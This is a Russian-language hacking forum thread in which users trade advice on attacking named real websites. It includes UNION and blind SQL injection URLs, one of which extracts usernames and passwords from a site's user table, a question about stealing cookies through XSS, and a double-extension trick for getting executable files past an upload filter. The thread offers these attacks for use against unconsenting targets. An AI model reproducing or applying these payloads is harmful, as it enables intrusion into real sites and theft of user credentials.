У меня вопрос по MS Access. Есть сайт http://www.ruw.edu.bh/template2.asp?id=218 Подобрал кол-во полей с помощью order+by, их оказалось 13. Попробовал угадать имя таблицы, угадал таблицу user. Но при таком запросе http://www.ruw.edu.bh/template2.asp?id=-218+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13+from+user Выводит какую-то ошибку...( Что я не так делаю?
Access имеет зарезервированные слова и символы которые нельзя использовать абы как В данном случае ничего ты не нашёл, user не может быть таблицей, как и любое из этих слов : http://office.microsoft.com/ru-ru/access/HA100306431049.aspx
select+from+user использовать нельзя вот прочти ещё это: https://forum.antichat.ru/showpost.php?p=898813&postcount=25
Сделал брутер для именно этого сайта (Access) по словарям от SIPT4 - ни одной таблы не нашел, гы если интересно, путь: 'c:\windows\system32\inetsrv\ Интересно, у кого-нибудь есть словари для ACCESS? А то скрипт есть, а словаря нормального на такие случаи нет
Собственно просто так выкладываю так как просто красивая ошибка жаль правда не че вывести нельзя. Code: http://soft.mail.ru/biblio/index.php?cat_id=21&year=2008&order=n&searchstring=%')/**/order/**/by/**/99%23
Почему нельзя, 4-ая ветка: Code: http://soft.mail.ru/biblio/index.php?cat_id=21&year=2008&order=n&searchstring=%')/**/and/**/substring(version(),1,1)=4%23
Если вместо 4 подставить 3 или 5 - результат на странице будет совсем другой. Тут blind sql-inj, но вполне работабельный
Вечер добрый , вобщем нашёл на одном крупном сайте xss (пассивку). Попытался вывести куки через алерт , и получил : Code: <store.**********.com> undefined , Что бы это могло значить ?
Есть доступ в админку, заливаю файл, php файлы не выполняются, а html выполняется. можно заливать любые файлы. залил пустой .htacess, таже фигня. подскажите как быть.
Воспользуйся плагином для фф (или другим альтернативным способом), перехвати то, что передается серверу... Там может быть, что типо файл только html передается и т.д... =) Еще кстати попробуй так [filename].html.PhP5 - может поможет
Нашел тут SQL-иньекция и вот очень хочеться раскрутить) Вот сама иньекия: Code: http://www.gnn.tv/videos/video.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+from+gnn_users-- К сожелению не могу никак подобрать колонки =( Может поможет кто-нить) ?
http://www.gnn.tv/videos/video.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x2F,usr_name,usr_pass),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+from+gnn_users-- Сурс морды смотрите <div class="input_wrap"><input type="text" name="usr_name" value="user name" onfocus="if(this.value=='user name')this.value='';" onblur="if(this.value=='')this.value='user name';"></div> <div class="input_wrap"><input type="password" name="usr_pass" value=""></div> Я уже несколько раз обращал на это внимание. Прямой связи тут конечно нет, но нужно учитывать “человеческий фактор”